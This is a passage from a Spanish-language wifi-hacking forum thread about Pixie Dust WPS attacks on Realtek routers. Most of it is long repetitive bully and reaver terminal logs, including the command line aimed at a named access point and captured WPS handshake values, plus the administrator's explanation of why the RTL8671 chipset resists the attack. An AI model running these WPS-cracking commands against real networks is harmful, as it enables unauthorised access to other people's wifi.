[+] Tx(DeAuth) = 'Timeout' Next pin '90946509'
[+] Sent packet not acknowledged after 3 attempts
[+] Tx(DeAuth) = 'Timeout' Next pin '90946509'
[+] Sent packet not acknowledged after 3 attempts
[+] Tx(DeAuth) = 'Timeout' Next pin '90946509'
[+] Sent packet not acknowledged after 3 attempts
[+] Tx(DeAuth) = 'Timeout' Next pin '90946509'
[+] Sent packet not acknowledged after 3 attempts
[+] Tx(DeAuth) = 'Timeout' Next pin '90946509'
[+] Sent packet not acknowledged after 3 attempts
[+] Tx(DeAuth) = 'Timeout' Next pin '90946509'
[+] Sent packet not acknowledged after 3 attempts
[+] Tx(DeAuth) = 'Timeout' Next pin '90946509'
[+] Sent packet not acknowledged after 3 attempts
[+] Tx(DeAuth) = 'Timeout' Next pin '90946509'
[+] Sent packet not acknowledged after 3 attempts
[+] Tx(DeAuth) = 'Timeout' Next pin '90946509'
[+] Sent packet not acknowledged after 3 attempts
[+] Tx(DeAuth) = 'Timeout' Next pin '90946509'
[+] Sent packet not acknowledged after 3 attempts
[+] Tx(DeAuth) = 'Timeout' Next pin '90946509'
[+] Sent packet not acknowledged after 3 attempts
[+] Tx(DeAuth) = 'Timeout' Next pin '90946509'
[+] Sent packet not acknowledged after 3 attempts
[+] Tx(DeAuth) = 'Timeout' Next pin '90946509'
[+] Sent packet not acknowledged after 3 attempts
[+] Tx(DeAuth) = 'Timeout' Next pin '90946509'
[+] Sent packet not acknowledged after 3 attempts
[+] Tx(DeAuth) = 'Timeout' Next pin '90946509'
[+] Sent packet not acknowledged after 3 attempts
[+] Tx(DeAuth) = 'Timeout' Next pin '90946509'
[+] Sent packet not acknowledged after 3 attempts
[+] Tx(DeAuth) = 'Timeout' Next pin '90946509'
[+] Sent packet not acknowledged after 3 attempts
[+] Tx(DeAuth) = 'Timeout' Next pin '90946509'
[+] Sent packet not acknowledged after 3 attempts
[+] Tx(DeAuth) = 'Timeout' Next pin '90946509'
[+] Sent packet not acknowledged after 3 attempts
[+] Tx(DeAuth) = 'Timeout' Next pin '90946509'
[+] Sent packet not acknowledged after 3 attempts
[+] Tx(DeAuth) = 'Timeout' Next pin '90946509'
[+] Sent packet not acknowledged after 3 attempts
[+] Tx(DeAuth) = 'Timeout' Next pin '90946509'
[+] Sent packet not acknowledged after 3 attempts
[+] Tx(DeAuth) = 'Timeout' Next pin '90946509'
[+] Sent packet not acknowledged after 3 attempts
[+] Tx(DeAuth) = 'Timeout' Next pin '90946509'
[+] Sent packet not acknowledged after 3 attempts
[+] Tx(DeAuth) = 'Timeout' Next pin '90946509'
[+] Sent packet not acknowledged after 3 attempts
[+] Tx(DeAuth) = 'Timeout' Next pin '90946509'
[+] Sent packet not acknowledged after 3 attempts
[+] Tx(DeAuth) = 'Timeout' Next pin '90946509'
[+] Sent packet not acknowledged after 3 attempts
[+] Tx(DeAuth) = 'Timeout' Next pin '90946509'
[+] Sent packet not acknowledged after 3 attempts
[+] Tx(DeAuth) = 'Timeout' Next pin '90946509'
[+] Sent packet not acknowledged after 3 attempts
[+] Tx(DeAuth) = 'Timeout' Next pin '90946509'
[+] Sent packet not acknowledged after 3 attempts
[+] Tx(DeAuth) = 'Timeout' Next pin '90946509'
[+] Sent packet not acknowledged after 3 attempts
[+] Tx(DeAuth) = 'Timeout' Next pin '90946509'
[+] Sent packet not acknowledged after 3 attempts
[+] Tx(DeAuth) = 'Timeout' Next pin '90946509'
[+] Sent packet not acknowledged after 3 attempts
[+] Tx(DeAuth) = 'Timeout' Next pin '90946509'
[+] Sent packet not acknowledged after 3 attempts
[+] Tx(DeAuth) = 'Timeout' Next pin '90946509'
[+] Sent packet not acknowledged after 3 attempts
[+] Tx(DeAuth) = 'Timeout' Next pin '90946509'
[+] Sent packet not acknowledged after 3 attempts
[+] Tx(DeAuth) = 'Timeout' Next pin '90946509'
[+] Sent packet not acknowledged after 3 attempts
[+] Tx(DeAuth) = 'Timeout' Next pin '90946509'
[+] Sent packet not acknowledged after 3 attempts
[+] Tx(DeAuth) = 'Timeout' Next pin '90946509'
[+] Sent packet not acknowledged after 3 attempts
[+] Tx(DeAuth) = 'Timeout' Next pin '90946509'
[+] Sent packet not acknowledged after 3 attempts
[+] Tx(DeAuth) = 'Timeout' Next pin '90946509'
[+] Sent packet not acknowledged after 3 attempts
[+] Tx(DeAuth) = 'Timeout' Next pin '90946509'
[+] Sent packet not acknowledged after 3 attempts
[+] Tx(DeAuth) = 'Timeout' Next pin '90946509'
[+] Sent packet not acknowledged after 3 attempts
[+] Tx(DeAuth) = 'Timeout' Next pin '90946509'
[+] Sent packet not acknowledged after 3 attempts
[+] Tx(DeAuth) = 'Timeout' Next pin '90946509'
[+] Sent packet not acknowledged after 3 attempts
[+] Tx(DeAuth) = 'Timeout' Next pin '90946509'
[+] Sent packet not acknowledged after 3 attempts
[+] Tx(DeAuth) = 'Timeout' Next pin '90946509'
[+] Sent packet not acknowledged after 3 attempts
[+] Tx(DeAuth) = 'Timeout' Next pin '90946509'
[+] Sent packet not acknowledged after 3 attempts
[+] Tx(DeAuth) = 'Timeout' Next pin '90946509'
[+] Sent packet not acknowledged after 3 attempts
[+] Tx(DeAuth) = 'Timeout' Next pin '90946509'
[+] Sent packet not acknowledged after 3 attempts
[+] Tx(DeAuth) = 'Timeout' Next pin '90946509'
[+] Sent packet not acknowledged after 3 attempts
[+] Tx(DeAuth) = 'Timeout' Next pin '90946509'
[+] Sent packet not acknowledged after 3 attempts
[+] Tx(DeAuth) = 'Timeout' Next pin '90946509'
[+] Sent packet not acknowledged after 3 attempts
[+] Tx(DeAuth) = 'Timeout' Next pin '90946509'
[+] Sent packet not acknowledged after 3 attempts
[+] Tx(DeAuth) = 'Timeout' Next pin '90946509'
[+] Sent packet not acknowledged after 3 attempts
[+] Tx(DeAuth) = 'Timeout' Next pin '90946509'
[+] Sent packet not acknowledged after 3 attempts
[+] Tx(DeAuth) = 'Timeout' Next pin '90946509'
[+] Sent packet not acknowledged after 3 attempts
[+] Tx(DeAuth) = 'Timeout' Next pin '90946509'
[+] Sent packet not acknowledged after 3 attempts
[+] Tx(DeAuth) = 'Timeout' Next pin '90946509'
[+] Sent packet not acknowledged after 3 attempts
[+] Tx(DeAuth) = 'Timeout' Next pin '90946509'
[+] Sent packet not acknowledged after 3 attempts
[+] Tx(DeAuth) = 'Timeout' Next pin '90946509'
[+] Sent packet not acknowledged after 3 attempts
[+] Tx(DeAuth) = 'Timeout' Next pin '90946509'
[+] Sent packet not acknowledged after 3 attempts
[+] Tx(DeAuth) = 'Timeout' Next pin '90946509'
[+] Sent packet not acknowledged after 3 attempts
[+] Tx(DeAuth) = 'Timeout' Next pin '90946509'
[+] Sent packet not acknowledged after 3 attempts
[+] Tx(DeAuth) = 'Timeout' Next pin '90946509'
[+] Sent packet not acknowledged after 3 attempts
[+] Tx(DeAuth) = 'Timeout' Next pin '90946509'
[+] Sent packet not acknowledged after 3 attempts
[+] Tx(DeAuth) = 'Timeout' Next pin '90946509'
[+] Sent packet not acknowledged after 3 attempts
[+] Tx(DeAuth) = 'Timeout' Next pin '90946509'
[+] Sent packet not acknowledged after 3 attempts
[+] Tx(DeAuth) = 'Timeout' Next pin '90946509'
[+] Sent packet not acknowledged after 3 attempts
[+] Tx(DeAuth) = 'Timeout' Next pin '90946509'
[+] Sent packet not acknowledged after 3 attempts
[+] Tx(DeAuth) = 'Timeout' Next pin '90946509'
[+] Sent packet not acknowledged after 3 attempts
[+] Tx(DeAuth) = 'Timeout' Next pin '90946509'
[+] Sent packet not acknowledged after 3 attempts
[+] Tx(DeAuth) = 'Timeout' Next pin '90946509'
[+] Sent packet not acknowledged after 3 attempts
[+] Tx(DeAuth) = 'Timeout' Next pin '90946509'
[+] Sent packet not acknowledged after 3 attempts
[+] Tx(DeAuth) = 'Timeout' Next pin '90946509'
[+] Sent packet not acknowledged after 3 attempts
[+] Tx(DeAuth) = 'Timeout' Next pin '90946509'
[+] Sent packet not acknowledged after 3 attempts
[+] Tx(DeAuth) = 'Timeout' Next pin '90946509'
[+] Sent packet not acknowledged after 3 attempts
[+] Tx(DeAuth) = 'Timeout' Next pin '90946509'
[+] Sent packet not acknowledged after 3 attempts
[+] Tx(DeAuth) = 'Timeout' Next pin '90946509'
[+] Sent packet not acknowledged after 3 attempts
[+] Tx(DeAuth) = 'Timeout' Next pin '90946509'
[+] Sent packet not acknowledged after 3 attempts
[+] Tx(DeAuth) = 'Timeout' Next pin '90946509'
[+] Sent packet not acknowledged after 3 attempts
[+] Tx(DeAuth) = 'Timeout' Next pin '90946509'
[+] Sent packet not acknowledged after 3 attempts
[+] Tx(DeAuth) = 'Timeout' Next pin '90946509'
[+] Sent packet not acknowledged after 3 attempts
[+] Tx(DeAuth) = 'Timeout' Next pin '90946509'
[+] Sent packet not acknowledged after 3 attempts
[+] Tx(DeAuth) = 'Timeout' Next pin '90946509'
[+] Sent packet not acknowledged after 3 attempts
[+] Tx(DeAuth) = 'Timeout' Next pin '90946509'
[+] Sent packet not acknowledged after 3 attempts
[+] Tx(DeAuth) = 'Timeout' Next pin '90946509'
[+] Sent packet not acknowledged after 3 attempts
[+] Tx(DeAuth) = 'Timeout' Next pin '90946509'
[+] Sent packet not acknowledged after 3 attempts
[+] Tx(DeAuth) = 'Timeout' Next pin '90946509'
[+] Sent packet not acknowledged after 3 attempts
[+] Tx(DeAuth) = 'Timeout' Next pin '90946509'
[+] Sent packet not acknowledged after 3 attempts
[+] Tx(DeAuth) = 'Timeout' Next pin '90946509'
[+] Sent packet not acknowledged after 3 attempts
[+] Tx(DeAuth) = 'Timeout' Next pin '90946509'
[+] Sent packet not acknowledged after 3 attempts
[+] Tx(DeAuth) = 'Timeout' Next pin '90946509'
[+] Sent packet not acknowledged after 3 attempts
[+] Tx(DeAuth) = 'Timeout' Next pin '90946509'
[+] Sent packet not acknowledged after 3 attempts
[+] Tx(DeAuth) = 'Timeout' Next pin '90946509'
[+] Sent packet not acknowledged after 3 attempts
[+] Tx(DeAuth) = 'Timeout' Next pin '90946509'
[+] Sent packet not acknowledged after 3 attempts
[+] Tx(DeAuth) = 'Timeout' Next pin '90946509'
[+] Sent packet not acknowledged after 3 attempts
[+] Tx(DeAuth) = 'Timeout' Next pin '90946509'
[+] Sent packet not acknowledged after 3 attempts
[+] Tx(DeAuth) = 'Timeout' Next pin '90946509'
[+] Sent packet not acknowledged after 3 attempts
[+] Tx(DeAuth) = 'Timeout' Next pin '90946509'
[+] Sent packet not acknowledged after 3 attempts
[+] Tx(DeAuth) = 'Timeout' Next pin '90946509'
[+] Sent packet not acknowledged after 3 attempts
[+] Tx(DeAuth) = 'Timeout' Next pin '90946509'
[+] Sent packet not acknowledged after 3 attempts
[+] Tx(DeAuth) = 'Timeout' Next pin '90946509'
[+] Sent packet not acknowledged after 3 attempts
[+] Tx(DeAuth) = 'Timeout' Next pin '90946509'
[+] Sent packet not acknowledged after 3 attempts
[+] Tx(DeAuth) = 'Timeout' Next pin '90946509'
[+] Sent packet not acknowledged after 3 attempts
[+] Tx(DeAuth) = 'Timeout' Next pin '90946509'
[+] Sent packet not acknowledged after 3 attempts
[+] Tx(DeAuth) = 'Timeout' Next pin '90946509'
[+] Sent packet not acknowledged after 3 attempts
[+] Tx(DeAuth) = 'Timeout' Next pin '90946509'
[+] Sent packet not acknowledged after 3 attempts
[+] Tx(DeAuth) = 'Timeout' Next pin '90946509'
[+] Sent packet not acknowledged after 3 attempts
[+] Tx(DeAuth) = 'Timeout' Next pin '90946509'
[+] Sent packet not acknowledged after 3 attempts
[+] Tx(DeAuth) = 'Timeout' Next pin '90946509'
[+] Sent packet not acknowledged after 3 attempts
[+] Tx(DeAuth) = 'Timeout' Next pin '90946509'
[+] Sent packet not acknowledged after 3 attempts
[+] Tx(DeAuth) = 'Timeout' Next pin '90946509'
[+] Sent packet not acknowledged after 3 attempts
[+] Tx(DeAuth) = 'Timeout' Next pin '90946509'
[+] Sent packet not acknowledged after 3 attempts
[+] Tx(DeAuth) = 'Timeout' Next pin '90946509'
[+] Sent packet not acknowledged after 3 attempts Desconectado
#7 21-05-2016 20:13:56
- kcdtv
- Administrator
- Registrado: 14-11-2014
- Mensajes: 5,701
Re: Pixie dust WPS : ¡Realtek ("rtl819x project") cae también!
Debes usar la versión modificada por aanarchy para hacer un ataque pixiedust : Bully WPS: La alternativa a Reaver renace con soporte Pixiewps
De todo modo si no has podido comprobar ni una sola primeta mitad de PIN es que no puedes mandar un M4
Si no puedes mandar un M4 es que no has recibido a ningún momento un M3 y por lo tanto no vas a poder hacer un ataque pixie dust.
Mejor para tu anonimato borrar/editar el bSSID y eSSID de tu red y se ve también la mac de tu dispositivo wifi.
Edito tu mensaje
Ten cuidado la próxima vez (lo digo por ti)
PD : Veo que el primer post no esta completo (faltan los últimos avances) y tiene unas cuentas faltas (culpa a las prisas y a la emoción ), lo retocaré.
Desconectado
#8 21-05-2016 21:12:16
- sergio1985
- Usuario
- Registrado: 02-03-2016
- Mensajes: 24
Re: Pixie dust WPS : ¡Realtek ("rtl819x project") cae también!
Bueno gracias por tus recomendaciones voy a intentar de nuevo con la version modificada a ver si tengo suerte
Bueno saludos aqui de nuevo molestando resultado ataque con bully tambien la e probado colocando en vez de v3 v4 tambien con el adaptador wifi que viene integrado en pc es una intel pero sin buenos resultados
root@kali:~# time sudo bully wlan1mon -b 00:13:33 -c 1 -d -v 3
[!] Bully v1.1 - WPS vulnerability assessment utility
[P] Modified for pixiewps by AAnarchYY(aanarchyy@gmail.com)
[+] Switching interface 'wlan1mon' to channel '1'
[!] Using '01:0d:b1' for the source MAC address
[+] Datalink type set to '127', radiotap headers present
[+] Scanning for beacon from '00:13:33' on channel '1'
[!] Excessive (3) FCS failures while reading next packet
[!] Excessive (3) FCS failures while reading next packet
[!] Excessive (3) FCS failures while reading next packet
[!] Disabling FCS validation (assuming --nofcs)
[+] Got beacon for 'Rocabado' (00:13:33)
[+] Loading randomized pins from '/root/.bully/pins'
[!] Restoring session from '/root/.bully/001333.run'
[+] Index of starting pin number is '0000000'
[+] Last State = 'NoAssoc' Next pin '00524858'
[+] Sent packet not acknowledged after 3 attempts
[+] Tx(DeAuth) = 'Timeout' Next pin '00524858'
[+] Sent packet not acknowledged after 3 attempts
[+] Tx(DeAuth) = 'Timeout' Next pin '00524858'
[+] Sent packet not acknowledged after 3 attempts
[+] Tx(DeAuth) = 'Timeout' Next pin '00524858'
[+] Sent packet not acknowledged after 3 attempts
[+] Tx(DeAuth) = 'Timeout' Next pin '00524858'
[+] Sent packet not acknowledged after 3 attempts
[+] Tx(DeAuth) = 'Timeout' Next pin '00524858'
[+] Sent packet not acknowledged after 3 attempts
[+] Tx(DeAuth) = 'Timeout' Next pin '00524858'
[+] Sent packet not acknowledged after 3 attempts
[+] Tx(DeAuth) = 'Timeout' Next pin '00524858'
[+] Sent packet not acknowledged after 3 attempts
[+] Tx(DeAuth) = 'Timeout' Next pin '00524858'
[+] Sent packet not acknowledged after 3 attempts
[+] Tx(DeAuth) = 'Timeout' Next pin '00524858'
[+] Sent packet not acknowledged after 3 attempts
[+] Tx(DeAuth) = 'Timeout' Next pin '00524858'
[+] Sent packet not acknowledged after 3 attempts
[+] Tx(DeAuth) = 'Timeout' Next pin '00524858'
[+] Sent packet not acknowledged after 3 attempts
[+] Tx(DeAuth) = 'Timeout' Next pin '00524858'
[+] Sent packet not acknowledged after 3 attempts
[+] Tx(DeAuth) = 'Timeout' Next pin '00524858'
[+] Sent packet not acknowledged after 3 attempts
[+] Tx(DeAuth) = 'Timeout' Next pin '00524858'
[+] Sent packet not acknowledged after 3 attempts
[+] Tx(DeAuth) = 'Timeout' Next pin '00524858'
[+] Sent packet not acknowledged after 3 attempts
[+] Tx(DeAuth) = 'Timeout' Next pin '00524858'
[+] Sent packet not acknowledged after 3 attempts
[+] Tx(DeAuth) = 'Timeout' Next pin '00524858'
[+] Sent packet not acknowledged after 3 attempts
[+] Tx(DeAuth) = 'Timeout' Next pin '00524858'
[+] Sent packet not acknowledged after 3 attempts
[+] Tx(DeAuth) = 'Timeout' Next pin '00524858'
[+] Sent packet not acknowledged after 3 attempts
[+] Tx(DeAuth) = 'Timeout' Next pin '00524858'
[+] Sent packet not acknowledged after 3 attempts
[+] Tx(DeAuth) = 'Timeout' Next pin '00524858'
[+] Sent packet not acknowledged after 3 attempts
[+] Tx(DeAuth) = 'Timeout' Next pin '00524858'
[+] Sent packet not acknowledged after 3 attempts
[+] Tx(DeAuth) = 'Timeout' Next pin '00524858'
[+] Sent packet not acknowledged after 3 attempts
[+] Tx(DeAuth) = 'Timeout' Next pin '00524858'
[+] Sent packet not acknowledged after 3 attempts
[+] Tx(DeAuth) = 'Timeout' Next pin '00524858'
[+] Sent packet not acknowledged after 3 attempts
[+] Tx(DeAuth) = 'Timeout' Next pin '00524858'
[+] Sent packet not acknowledged after 3 attempts
[+] Tx(DeAuth) = 'Timeout' Next pin '00524858'
[+] Sent packet not acknowledged after 3 attempts
[+] Tx(DeAuth) = 'Timeout' Next pin '00524858'
[+] Sent packet not acknowledged after 3 attempts
[+] Tx(DeAuth) = 'Timeout' Next pin '00524858'
[+] Sent packet not acknowledged after 3 attempts
[+] Tx(DeAuth) = 'Timeout' Next pin '00524858'
[+] Sent packet not acknowledged after 3 attempts
[+] Tx(DeAuth) = 'Timeout' Next pin '00524858'
[+] Sent packet not acknowledged after 3 attempts
[+] Tx(DeAuth) = 'Timeout' Next pin '00524858'
[+] Sent packet not acknowledged after 3 attempts
[+] Tx(DeAuth) = 'Timeout' Next pin '00524858'
[+] Sent packet not acknowledged after 3 attempts
[+] Tx(DeAuth) = 'Timeout' Next pin '00524858'
[+] Sent packet not acknowledged after 3 attempts
[+] Tx(DeAuth) = 'Timeout' Next pin '00524858'
[+] Sent packet not acknowledged after 3 attempts
[+] Tx(DeAuth) = 'Timeout' Next pin '00524858'
[+] Sent packet not acknowledged after 3 attempts
[+] Tx(DeAuth) = 'Timeout' Next pin '00524858'
[+] Sent packet not acknowledged after 3 attempts
[+] Tx(DeAuth) = 'Timeout' Next pin '00524858'
[+] Sent packet not acknowledged after 3 attempts
[+] Tx(DeAuth) = 'Timeout' Next pin '00524858'
[+] Sent packet not acknowledged after 3 attempts
[+] Tx(DeAuth) = 'Timeout' Next pin '00524858'
[+] Sent packet not acknowledged after 3 attempts
[+] Tx(DeAuth) = 'Timeout' Next pin '00524858'
[+] Sent packet not acknowledged after 3 attempts
[+] Tx(DeAuth) = 'Timeout' Next pin '00524858'
[+] Sent packet not acknowledged after 3 attempts
[+] Tx(DeAuth) = 'Timeout' Next pin '00524858'
[+] Sent packet not acknowledged after 3 attempts
[+] Tx(DeAuth) = 'Timeout' Next pin '00524858'
[+] Sent packet not acknowledged after 3 attempts
[+] Tx(DeAuth) = 'Timeout' Next pin '00524858'
[+] Sent packet not acknowledged after 3 attempts
[+] Tx(DeAuth) = 'Timeout' Next pin '00524858'
[+] Sent packet not acknowledged after 3 attempts
[+] Tx(DeAuth) = 'Timeout' Next pin '00524858'
[+] Sent packet not acknowledged after 3 attempts
[+] Tx(DeAuth) = 'Timeout' Next pin '00524858'
[+] Sent packet not acknowledged after 3 attempts
[+] Tx(DeAuth) = 'Timeout' Next pin '00524858'
[+] Sent packet not acknowledged after 3 attempts
[+] Tx(DeAuth) = 'Timeout' Next pin '00524858'
[+] Sent packet not acknowledged after 3 attempts
[+] Tx(DeAuth) = 'Timeout' Next pin '00524858'
[+] Sent packet not acknowledged after 3 attempts
[+] Tx(DeAuth) = 'Timeout' Next pin '00524858'
[+] Sent packet not acknowledged after 3 attempts
[+] Tx(DeAuth) = 'Timeout' Next pin '00524858'
[+] Sent packet not acknowledged after 3 attempts
[+] Tx(DeAuth) = 'Timeout' Next pin '00524858'
[+] Sent packet not acknowledged after 3 attempts
[+] Tx(DeAuth) = 'Timeout' Next pin '00524858'
[+] Sent packet not acknowledged after 3 attempts
[+] Tx(DeAuth) = 'Timeout' Next pin '00524858'
[+] Sent packet not acknowledged after 3 attempts
[+] Tx(DeAuth) = 'Timeout' Next pin '00524858'
[+] Sent packet not acknowledged after 3 attempts
[+] Tx(DeAuth) = 'Timeout' Next pin '00524858'
[+] Sent packet not acknowledged after 3 attempts
[+] Tx(DeAuth) = 'Timeout' Next pin '00524858'
[+] Sent packet not acknowledged after 3 attempts
[+] Tx(DeAuth) = 'Timeout' Next pin '00524858'
[+] Sent packet not acknowledged after 3 attempts
[+] Tx(DeAuth) = 'Timeout' Next pin '00524858'
[+] Sent packet not acknowledged after 3 attempts
[+] Tx(DeAuth) = 'Timeout' Next pin '00524858'
[+] Sent packet not acknowledged after 3 attempts
[+] Tx(DeAuth) = 'Timeout' Next pin '00524858'
[+] Sent packet not acknowledged after 3 attempts
[+] Tx(DeAuth) = 'Timeout' Next pin '00524858'
[+] Sent packet not acknowledged after 3 attempts
[+] Tx(DeAuth) = 'Timeout' Next pin '00524858'
[+] Sent packet not acknowledged after 3 attempts
[+] Tx(DeAuth) = 'Timeout' Next pin '00524858'
[+] Sent packet not acknowledged after 3 attempts
[+] Tx(DeAuth) = 'Timeout' Next pin '00524858'
[+] Sent packet not acknowledged after 3 attempts
[+] Tx(DeAuth) = 'Timeout' Next pin '00524858'
[+] Sent packet not acknowledged after 3 attempts
[+] Tx(DeAuth) = 'Timeout' Next pin '00524858'
[+] Sent packet not acknowledged after 3 attempts
[+] Tx(DeAuth) = 'Timeout' Next pin '00524858'
[+] Sent packet not acknowledged after 3 attempts
[+] Tx(DeAuth) = 'Timeout' Next pin '00524858'
[+] Sent packet not acknowledged after 3 attempts
[+] Tx(DeAuth) = 'Timeout' Next pin '00524858'
[+] Sent packet not acknowledged after 3 attempts
[+] Tx(DeAuth) = 'Timeout' Next pin '00524858'
[+] Sent packet not acknowledged after 3 attempts
[+] Tx(DeAuth) = 'Timeout' Next pin '00524858'
[+] Sent packet not acknowledged after 3 attempts
[+] Tx(DeAuth) = 'Timeout' Next pin '00524858'
[+] Sent packet not acknowledged after 3 attempts
[+] Tx(DeAuth) = 'Timeout' Next pin '00524858'
[+] Sent packet not acknowledged after 3 attempts
[+] Tx(DeAuth) = 'Timeout' Next pin '00524858'
[+] Sent packet not acknowledged after 3 attempts
[+] Tx(DeAuth) = 'Timeout' Next pin '00524858'
[+] Sent packet not acknowledged after 3 attempts
[+] Tx(DeAuth) = 'Timeout' Next pin '00524858'
[+] Sent packet not acknowledged after 3 attempts
[+] Tx(DeAuth) = 'Timeout' Next pin '00524858'
[+] Sent packet not acknowledged after 3 attempts
[+] Tx(DeAuth) = 'Timeout' Next pin '00524858'
[+] Sent packet not acknowledged after 3 attempts
[+] Tx(DeAuth) = 'Timeout' Next pin '00524858'
[+] Sent packet not acknowledged after 3 attempts
[+] Tx(DeAuth) = 'Timeout' Next pin '00524858'
[+] Sent packet not acknowledged after 3 attempts
[+] Tx(DeAuth) = 'Timeout' Next pin '00524858'
[+] Sent packet not acknowledged after 3 attempts
[+] Tx(DeAuth) = 'Timeout' Next pin '00524858'
[+] Sent packet not acknowledged after 3 attempts
[+] Tx(DeAuth) = 'Timeout' Next pin '00524858'
[+] Sent packet not acknowledged after 3 attempts
[+] Tx(DeAuth) = 'Timeout' Next pin '00524858'
^C
Saved session to '/root/.bully/001333.run'
real 0m36.012s
user 0m0.080s
sys 0m0.340s Desconectado
#9 23-05-2016 02:58:53
- d1k0w0ns
- Expulsado
- Registrado: 12-06-2015
- Mensajes: 374
Re: Pixie dust WPS : ¡Realtek ("rtl819x project") cae también!
tambien la e probado colocando en vez de v3 v4 tambien con el adaptador wifi que viene integrado en pc es una intel pero sin buenos resultados
v3 y v4 es solo mas o menos informacion nada que ver con conseguir el pin, como si no lo quieres poner
Desconectado
#10 23-05-2016 08:10:56
- kcdtv
- Administrator
- Registrado: 14-11-2014
- Mensajes: 5,701
Re: Pixie dust WPS : ¡Realtek ("rtl819x project") cae también!
Es lo mismo.
Estas en bucle sobre tu primer PIN.
Si no consigues comprobar una primera mitad es que no has podido mandar un M4 porque no has recibido el M3.
La mitad de las cadenas necesarias para hacer un ataque pixie dust, cuál sea el chipset del punto de acceso, están en el M3.
No M3 = no pixie dust.
Desconectado
#11 24-05-2016 07:01:58
- sergio1985
- Usuario
- Registrado: 02-03-2016
- Mensajes: 24
Re: Pixie dust WPS : ¡Realtek ("rtl819x project") cae también!
Bueno mis pruebas para obtener pin wps con la mac 00:13:33 terminaron agradecido por sus recomendaciones y seguire leyendo a ver si aparece algo nuevo
Desconectado
#12 24-05-2016 23:33:40
- kcdtv
- Administrator
- Registrado: 14-11-2014
- Mensajes: 5,701
Re: Pixie dust WPS : ¡Realtek ("rtl819x project") cae también!
De todo modo, repasando el hilo pixiewps en el foro kali linux, he visto que el RTL8671 es el chipset... que no esta soportado.
Na' de na'
------------------------ edit ---------------------------------------
@ Patcher ( y a tod@s )
Con lo que has encontrado sobre las livebox he deicidio crear un nuevo tema para que vayamos estudiando esto y ver si podemos dar con el algoritmo :
Algoritmo WPS livebox 2.1 y 3.1 (orange / arcadyan)
Gracias otra vez, tengo un buen presentimiento, podrías haber dado en el clavo. 
Desconectado
#13 30-06-2016 22:54:36
- kcdtv
- Administrator
- Registrado: 14-11-2014
- Mensajes: 5,701
Re: Pixie dust WPS : ¡Realtek ("rtl819x project") cae también!
Pongo a continuación el mensajes de Sergio que no estaba en el sitios adecuado :
E que no puede ser yo que estaba feliz por haber obtenido M3 realizando la prueba con pixiewps 1.2modfificado -e -r -s -z -a -n -v 3 me sale pin no fue a ver si alguien me lo revisa y me dice si falta algo o no es vulnerable RTL 8671 mac 00:13:33
Reaver v1.5.2 WiFi Protected Setup Attack Tool Copyright (c) 2011, Tactical Network Solutions, Craig Heffner <cheffner@tacnetsol.com> mod by t6_x <t6_x@hotmail.com> & DataHead & Soxrok2212 & Wiire [+] Switching wlan1 to channel 6 [+] Waiting for beacon from 00:13:33: [!] WARNING: Failed to associate with 00:13:33: [+] Associated with 00:13:33: [+] Starting Cracking Session. Pin count: 0, Max pin attempts: 11000 [+] Trying pin 12345670. [+] Sending EAPOL START request [!] WARNING: Receive timeout occurred [+] Sending EAPOL START request [+] Received identity request [+] Sending identity response [+] Received identity request [+] Sending identity response [+] Received identity request [+] Sending identity response [P] E-Nonce: 00:00:54:7e:00:00:6a:5c:00:00:00:f6:00:00:71:ec [P] PKE: d0:14:1b:15:65:6e:96:b8:5f:ce:ad:2e:8e:76:33:0d:2b:1a:c1:57:6b:b0:26:e7:a3:28:c0:e1:ba:f8:cf:91:66:43:71:17:4c:08:ee:12:ec:92:b0:51:9c:54:87:9f:21:25:5b:e5:a8:77:0e:1f:a1:88:04:70:ef:42:3c:90:e3:4d:78:47:a6:fc:b4:92:45:63:d1:af:1d:b0:c4:81:ea:d9:85:2c:51:9b:f1:dd:42:9c:16:39:51:cf:69:18:1b:13:2a:ea:2a:36:84:ca:f3:5b:c5:4a:ca:1b:20:c8:8b:b3:b7:33:9f:f7:d5:6e:09:13:9d:77:f0:ac:58:07:90:97:93:82:51:db:be:75:e8:67:15:cc:6b:7c:0c:a9:45:fa:8d:d8:d6:61:be:b7:3b:41:40:32:79:8d:ad:ee:32:b5:dd:61:bf:10:5f:18:d8:92:17:76:0b:75:c5:d9:66:a5:a4:90:47:2c:eb:a9:e3:b4:22:4f:3d:89:fb:2b [P] WPS Manufacturer: Realtek Semiconductor Corp. [P] WPS Model Name: RTL8671 [P] WPS Model Number: EV-2006-07-27 [P] Access Point Serial Number: 123456789012347 [+] Received M1 message [P] R-Nonce: f2:5c:72:3f:6a:0c:a0:14:79:2d:c7:b3:a9:6d:68:44 [P] PKR: 97:27:1a:fa:d5:13:1b:70:3d:c1:44:9c:be:99:0c:66:96:11:0a:b5:8d:d6:41:1a:ee:60:1e:27:2c:c4:42:d8:f6:8b:12:81:12:40:03:ae:f3:1e:f6:34:25:08:9f:3b:8f:4a:d1:81:09:3f:b3:51:ee:ca:8c:a6:70:61:16:d9:3e:6c:11:55:56:e7:e3:d1:56:a0:4f:13:8c:ee:a6:70:5c:9e:7c:60:00:ec:72:d0:ec:eb:5e:6f:10:f5:6c:58:f2:94:8a:04:16:fb:09:70:e7:11:4a:47:52:bd:86:ac:44:02:8b:df:d0:b3:ed:df:fb:34:50:2a:06:cc:9a:2b:ff:6c:36:c2:cd:fc:7f:2d:4d:8d:6e:35:d5:97:35:dc:fb:0d:fa:b4:ef:8b:70:30:d9:bb:38:47:fd:b9:64:82:85:31:11:32:c2:52:78:ae:8f:99:37:2e:c9:1b:6d:00:97:d9:9f:44:cf:98:18:f8:6f:73:3a:c4:4c:f1:fc:cf [P] AuthKey: 30:f8:51:9e:d8:f6:b7:d4:8d:13:9d:93:19:63:cc:2a:cc:8b:d3:74:3e:7b:10:02:1d:49:c3:9b:54:1d:c3:cb [+] Sending M2 message [P] E-Hash1: 06:13:1a:f6:38:70:a8:31:29:ac:9b:82:37:4f:a5:a2:20:89:e6:66:48:80:23:60:b0:e5:48:99:f2:f5:cc:c1 [P] E-Hash2: 79:a8:c7:f4:59:73:5f:83:ef:32:9c:72:3b:9e:2b:c2:7f:2e:19:ff:6e:63:f5:79:9c:6f:c2:7d:20:69:e6:25 [+] Received M3 message [+] Sending M4 message [+] Received M5 message [+] Sending M6 message [+] Received M5 message [+] Sending WSC NACK [+] Sending WSC NACK
La respuesta es la misma que antes : Este chipset (Realtek RTL8671) no es vulnerable al ataque pixie dust
Desconectado
Anuncio
Temas similares
| Tema | Respuestas | Vistas | Ultimo mensaje |
|---|---|---|---|
|
|
26 | 7778 | 15-03-2023 16:57:32 por kcdtv |
|
Pegado: |
34 | 3812 | 12-03-2023 18:24:22 por Guybrush92 |
|
Pegado: |
